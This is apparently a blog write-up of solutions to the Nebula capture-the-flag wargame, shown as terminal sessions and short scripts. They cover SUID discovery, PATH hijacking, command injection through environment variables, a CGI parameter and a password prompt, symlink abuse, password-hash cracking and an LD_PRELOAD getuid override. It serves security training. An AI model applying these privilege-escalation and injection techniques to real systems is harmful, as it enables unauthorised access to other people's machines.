Solutions
Level 00
1 2 3 4 5 6 7 | level00@nebula:~$ find / -perm -4000 -user flag00 2>/dev/null /bin/.../flag00 /rofs/bin/.../flag00 level00@nebula:~$ /bin/.../flag00 Congrats, now run getflag to get your flag! flag00@nebula:~$ getflag You have successfully executed getflag on a target account | cs |
Level 01
1 2 3 4 5 6 7 | level01@nebula:/home/flag01$ ln -s /bin/bash /tmp/a level01@nebula:/home/flag01$ echo -e '#!/bin/bash\n/tmp/a' > /tmp/echo level01@nebula:/home/flag01$ chmod +x /tmp/echo level01@nebula:/home/flag01$ ./flag01 flag01@nebula:/home/flag01$ getflag You have successfully executed getflag on a target account flag01@nebula:/home/flag01$ | cs |
Level 02
1 2 3 4 5 | level02@nebula:/home/flag02$ export USER='-e "#!/bin/bash\n/bin/bash" > /tmp/level02;chmod +x /tmp/level02;/tmp/level02' level02@nebula:/home/flag02$ ./flag02 about to call system("/bin/echo -e "#!/bin/bash\n/bin/bash" > /tmp/level02;chmod +x /tmp/level02;/tmp/level02 is cool") flag02@nebula:/home/flag02$ getflag You have successfully executed getflag on a target account | cs |
Level 03
1 2 3 4 5 | level03@nebula:/home/flag03/writable.d$ echo "/bin/getflag >> /tmp/aa" > ./aa level03@nebula:/home/flag03/writable.d$ cat /tmp/aa cat: /tmp/aa: No such file or directory level03@nebula:/home/flag03/writable.d$ cat /tmp/aa You have successfully executed getflag on a target account | cs |
Level 04
1 2 3 4 5 6 7 | level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/level04 level04@nebula:/home/flag04$ ./flag04 /tmp/level04 06508b5e-8909-4f38-b630-fdb148a848a2 level04@nebula:/home/flag04$ su flag04 Password: sh-4.2$ getflag You have successfully executed getflag on a target account | cs |
Level 06
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | level06@nebula:/home/flag06$ cat /etc/passwd zero@ubuntu:~/Desktop/tool/john$ echo 'flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh' > ./flag06 zero@ubuntu:~/Desktop/tool/john/run$ ./john ../flag06 Loaded 1 password hash (descrypt, traditional crypt(3) [DES 64/64]) Press 'q' or Ctrl-C to abort, almost any other key for status hello (flag06) 1g 0:00:00:00 100% 2/3 100.0g/s 68900p/s 68900c/s 68900C/s 123456..magic Use the "--show" option to display all of the cracked passwords reliably Session completed level06@nebula:/home/flag06$ su flag06 Password: sh-4.2$ getflag You have successfully executed getflag on a target account | cs |
Level 07
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | level07@nebula:/home/flag07$ ./index.cgi Host=localhost;ls Content-type: text/html PING localhost (127.0.0.1) 56(84) bytes of data. 64 bytes from localhost (127.0.0.1): icmp_req=1 ttl=64 time=0.014 ms 64 bytes from localhost (127.0.0.1): icmp_req=2 ttl=64 time=0.023 ms 64 bytes from localhost (127.0.0.1): icmp_req=3 ttl=64 time=0.021 ms .... index.cgi thttpd.conf level07@nebula:/home/flag07$ wget http://127.0.0.1:7007/index.cgi?Host=%3bgetflag --2015-11-25 05:04:04-- http://127.0.0.1:7007/index.cgi?Host=%3bgetflag Connecting to 127.0.0.1:7007... failed: Connection refused. Hmm.... just pass.... | cs |
Level 08
1 2 3 4 5 6 | - just open pcap file with WireShark ; buf just be careful about 0x7f (means backspace) - backdoor bs bs bs 00rm8 bs ate -> backd00rmate level08@nebula:/home/flag08$ su flag08 Password: sh-4.2$ getflag You have successfully executed getflag on a target account | cs |
Level 09
1 2 3 4 | - function spam isn't used - argv[2] is used nowhere ; $use_me needs to be used Hmm.... i have no idea ... haha | cs |
Level 10
1 2 3 4 5 | - simply my nc doesn't work.... ; how to solve : make symbolic file with -f option in /tmp, and make another symbolic file to it ; run any program which can receive packet from it like nc, run flag10 ; and u can get token p.s but i find a strange file in home floder named 'x' , so i opened it and the answer is there! | cs |
Level 11
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | ; At first, i tried LD_PRELOAD, but it did't work because i didn't consider kind of encryption part ; Decryption Code #!/usr/bin/env python string = "/bin/getflag;" enc_string = "" key = 0 for i in string: char = ord(i) ^ key & 0xff enc_string += chr(char) key -= ord(i) & 0xff print "Content-Length: 1024\n" + enc_string + "A" * (1024 - len(enc_string)) | cs |
Level 12
1 2 3 4 5 | level12@nebula:/home/flag12$ nc localhost 50001 Password: ;/bin/getflag > /tmp/fff;echo 1 Better luck next time level12@nebula:/home/flag12$ cat /tmp/fff You have successfully executed getflag on a target account | cs |
Level 13
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | ; a.so source #include <sys/types.h> uid_t getuid(void) { return 1000; } level13@nebula:~$ cp ../flag13/flag13 ./ level13@nebula:~$ LD_PRELOAD=./a.so ./flag13 your token is b705702b-76a8-42b0-8844-3adabbe5ac58 level13@nebula:~$ su flag13 Password: sh-4.2$ getflag You have successfully executed getflag on a target account sh-4.2$ | cs |
Level 14
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 | level14@nebula:/home/flag14$ ./flag14 -e aaaaaaaaaaaaaaaaaaaaaaaaaaaaa abcdefghijklmnopqrstuvwxyz{|}'^C level14@nebula:/home/flag14$ ./flag14 -e bbbbbbbbbbbbbbbbbbbbbbbbbbbbb bcdefghijklmnopqrstuvwxyz{|}~'^C level14@nebula:/home/flag14$ ./flag14 -e abced acehh^C ; we can discover a algorithm without disassembling flag14 algorithm : chr(input_data[i] + i) -> enc_data[i] ; Decryption Source #!/usr/bin/env python import sys flag = "" cnt = 0 with open("/home/flag14/token", "r") as i: for j in i.read()[:-1]: flag += chr(ord(j) - cnt) cnt += 1 print flag level14@nebula:/home/flag14$ python /tmp/ab.py 8457c118-887c-4e40-a5a6-33a25353165 level14@nebula:/home/flag14$ su flag14 Password: sh-4.2$ getflag You have successfully executed getflag on a target account | cs |
Level 15
Level 16
Level 17
Level 18
Level 19
'Wargames > Exploit-Exercises' 카테고리의 다른 글
| [Exploit-Exercise] Fusion level02 (0) | 2016.08.29 |
|---|---|
| [Exploit-Exercise] Fusion level01 (1) | 2016.08.29 |
| [Exploit-Exercise] Fusion level00 (0) | 2016.08.29 |